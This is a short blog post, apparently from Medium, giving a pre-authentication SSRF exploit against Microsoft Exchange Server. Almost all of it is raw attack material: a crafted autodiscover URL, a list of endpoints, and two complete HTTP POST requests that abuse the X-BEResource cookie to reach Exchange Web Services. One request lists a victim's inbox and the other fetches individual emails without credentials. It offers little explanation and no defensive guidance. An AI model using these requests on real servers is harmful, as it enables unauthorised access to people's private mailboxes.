Pre-Auth SSRF To Full MailBox Access (Microsoft Exchange Server Exploit)

Exploitation:

 https://autodiscover.redacted.com/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
/powershell
/mapi/emsmdb
/autodiscover/autodiscover.xml
/ews/exchange.asmx
/owa/auth/Current/
/ecp/default.flt
/ecp/favicon.ico
POST /ecp/favicon.ico HTTP/1.1
Host: autodiscover.redacted.com
Content-Type: text/xml
Cookie: X-BEResource=[:[@redacted.com:444/ews/exchange.asmx#~1
Content-Length: 1128
<?xml version='1.0' encoding='utf-8'?>
<soap:Envelope
xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'
xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'
xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>
<soap:Header>
<t:RequestServerVersion Version="Exchange2016" />
</soap:Header>
<soap:Body>
<m:FindItem Traversal='Shallow'>
<m:ItemShape>
<t:BaseShape>AllProperties</t:BaseShape>
</m:ItemShape>
<m:ParentFolderIds>
<t:DistinguishedFolderId Id='inbox'>
<t:Mailbox>
<t:EmailAddress>info@redacted.com</t:EmailAddress>
</t:Mailbox>
</t:DistinguishedFolderId>
</m:ParentFolderIds>
</m:FindItem>
</soap:Body>
</soap:Envelope>
Payload used to retrieve individual emails without authentication.
POST /ecp/favicon.ico HTTP/1.1
Host: autodiscover.redacted.com
Content-Type: text/xml
Cookie: X-BEResource=[:[@redacted.com:444/ews/exchange.asmx#~1
Content-Length: 1062
<?xml version='1.0' encoding='utf-8'?>
<soap:Envelope
xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'
xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'
xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>
<soap:Header>
<t:RequestServerVersion Version="Exchange2016" />
</soap:Header>
<soap:Body>
<m:GetItem Traversal='Shallow'>
<m:ItemShape>
<t:BaseShape>AllProperties</t:BaseShape>
</m:ItemShape>
<m:ItemIds>
<t:ItemId Id="ItemID" ChangeKey="Changekey" />
</m:ItemIds>
</m:GetItem>
</soap:Body>
</soap:Envelope>

17 Y/o | OSCP | OSWE | Security Researcher | Twitter: VanshalG

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

{UPDATE} Bridge Builder Crane Operator - 3D city byggeri lastbil simulation spil Hack Free…

AVATA.Network ACO Whitelist Winners

{UPDATE} Run Salchicha Tirador FPS Game Hack Free Resources Generator

Why We Need Read Privacy Policies

Common Issue With Zoom and How To Fix It

4 IoT And Cyber Security Challenges And How To Overcome Them

Keeping pace with high-stakes cyber adversaries: Why Audit Committees pose new challenges to CIOs…

An overview of a good InfoSec Strategy

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Vanshal Gaur

Vanshal Gaur

17 Y/o | OSCP | OSWE | Security Researcher | Twitter: VanshalG

More from Medium

Hacking into Admin Panel of U.S Federal government system : C.A.R.S -without credentials.

Content Discovery: Automated and Manual

Breaking Parser Logic Gain Access To NGINX Plus API — Read/Write Upstreams.

Hacking the Margheriti-Server — PwntillDawn